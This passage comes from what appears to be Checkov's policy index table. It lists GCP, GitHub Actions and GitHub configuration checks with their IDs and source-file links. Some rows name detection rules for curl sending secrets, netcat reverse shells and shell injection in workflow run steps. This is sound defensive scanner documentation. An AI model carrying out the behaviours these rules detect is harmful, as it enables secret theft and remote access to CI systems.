[GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | -| 2295 | 
CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2296 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | -| 2297 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2298 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | -| 2299 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2300 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | -| 2301 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | -| 2302 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | -| 2303 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | -| 2304 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | -| 2305 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | -| 2306 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | -| 2307 | CKV2_GCP_1 | resource | 
google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | -| 2308 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | -| 2309 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | -| 2310 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2311 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2312 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2313 | CKV2_GCP_4 | resource | 
google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | -| 2314 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2315 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | -| 2316 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2317 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2318 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | 
[GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | -| 2319 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2320 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | -| 2321 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2322 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2323 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | -| 2324 | 
CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2325 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2326 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | -| 2327 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | -| 2328 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | -| 2329 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | 
[GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | -| 2330 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | -| 2331 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | -| 2332 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | -| 2333 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | -| 2334 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | -| 
2335 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) |
-| 2336 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
-| 2337 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) |
-| 2338 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) |
-| 2339 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) |
-| 2340 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | 
[GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) |
-| 2341 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) |
-| 2342 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) |
-| 2343 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) |
-| 2344 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) |
-| 2345 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) |
-| 2346 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | 
[GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) |
-| 2347 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) |
-| 2348 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) |
-| 2349 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
-| 2350 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
-| 2351 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
-| 2352 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
-| 2353 | CKV2_GCP_36 | resource | google_notebooks_runtime | 
Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
-| 2354 | CKV_GHA_1 | jobs | jobs | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
-| 2355 | CKV_GHA_1 | jobs | jobs.*.steps[] | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables | github_actions | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py) |
-| 2356 | CKV_GHA_2 | jobs | jobs | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
-| 2357 | CKV_GHA_2 | jobs | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | github_actions | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py) |
-| 2358 | CKV_GHA_3 | jobs | jobs | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
-| 2359 | CKV_GHA_3 | jobs | jobs.*.steps[] | Suspicious use of curl with secrets | github_actions | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py) |
-| 2360 | CKV_GHA_4 | jobs | jobs | Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
-| 2361 | CKV_GHA_4 | jobs | jobs.*.steps[] | 
Suspicious use of netcat with IP address | github_actions | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py) |
-| 2362 | CKV_GHA_5 | jobs | jobs | Found artifact build without evidence of cosign sign execution in pipeline | github_actions | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py) |
-| 2363 | CKV_GHA_6 | jobs | jobs | Found artifact build without evidence of cosign sbom attestation in pipeline | github_actions | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py) |
-| 2364 | CKV_GHA_7 | jobs | on | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty. | github_actions | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py) |
-| 2365 | CKV2_GHA_1 | resource | permissions | Ensure top-level permissions are not set to write-all | github_actions | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml) |
-| 2366 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) |
-| 2367 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) |
-| 2368 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | 
[RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) |
-| 2369 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 2370 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 2371 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
-| 2372 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
-| 2373 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
-| 2374 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
-| 2375 | CKV_GIT_6 | resource | github_branch_protection_v3 | Ensure GitHub branch protection rules requires signed commits | Terraform | 
[BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
-| 2376 | CKV2_GIT_1 | resource | github_repository | Ensure each Repository has branch protection associated | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml) |
-| 2377 | CKV_GITHUB_1 | github_configuration | * | Ensure GitHub organization security settings require 2FA | github_configuration | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py) |
-| 2378 | CKV_GITHUB_2 | github_configuration | * | Ensure GitHub organization security settings require SSO | github_configuration | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py) |
-| 2379 | CKV_GITHUB_3 | github_configuration | * | Ensure GitHub organization security settings has IP allow list enabled | github_configuration | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py) |
-| 2380 | CKV_GITHUB_4 | github_configuration | * | Ensure GitHub branch protection rules requires signed commits | github_configuration | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py) |
-| 2381 | CKV_GITHUB_5 | github_configuration | * | Ensure GitHub branch protection rules does not allow force pushes | github_configuration | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py) |
-| 2382 | CKV_GITHUB_6 | github_configuration | * | Ensure GitHub organization webhooks are using HTTPS | github_configuration | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py) |
-| 2383 | CKV_GITHUB_7 | 
github_configuration | * | Ensure GitHub repository webhooks are using HTTPS | github_configuration | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py) |
-| 2384 | CKV_GITHUB_8 | github_configuration | * | Ensure GitHub branch protection rules requires linear history | github_configuration | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py) |
-| 2385 | CKV_GITHUB_9 | github_configuration | * | Ensure 2 admins are set for each repository | github_configuration | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py) |
-| 2386 | CKV_GITHUB_10 | github_configuration | * | Ensure branch protection rules are enforced on administrators | github_configuration | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py) |
-| 2387 | CKV_GITHUB_11 | github_configuration | * | Ensure GitHub branch protection dismisses stale review on new commit | github_configuration | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py) |
-| 2388 | CKV_GITHUB_12 | github_configuration | * | Ensure GitHub branch protection restricts who can dismiss PR reviews | github_configuration | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py) |
-| 2389 | CKV_GITHUB_13 | github_configuration | * | Ensure GitHub branch protection requires CODEOWNER reviews | github_configuration | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py) |
-| 2390 | CKV_GITHUB_14 | github_configuration | * | Ensure all checks have passed before the merge of new code | 
github_configuration | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py) |
-| 2391 | CKV_GITHUB_15 | github_configuration | * | Ensure inactive branches are reviewed and removed periodically | github_configuration | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py) |
-| 2392 | CKV_GITHUB_16 | github_configuration | * | Ensure GitHub branch protection requires conversation resolution | github_configuration | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py) |
-| 2393 | CKV_GITHUB_17 | github_configuration | * | Ensure GitHub branch protection requires push restrictions | github_configuration | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py) |
-| 2394 | CKV_GITHUB_18 | github_configuration | * | Ensure GitHub branch protection rules does not allow deletions | github_configuration | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py) |
-| 2395 | CKV_GITHUB_19 | github_configuration | * | Ensure any change to code receives approval of two strongly authenticated users | github_configuration | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py) |
-| 2396 | CKV_GITHUB_20 | github_configuration | * | Ensure open git branches are up to date before they can be merged into codebase | github_configuration | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py) |
-| 2397 | CKV_GITHUB_21 | github_configuration | * | Ensure public repository creation is limited to specific members | github_configuration | 
[public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py) |
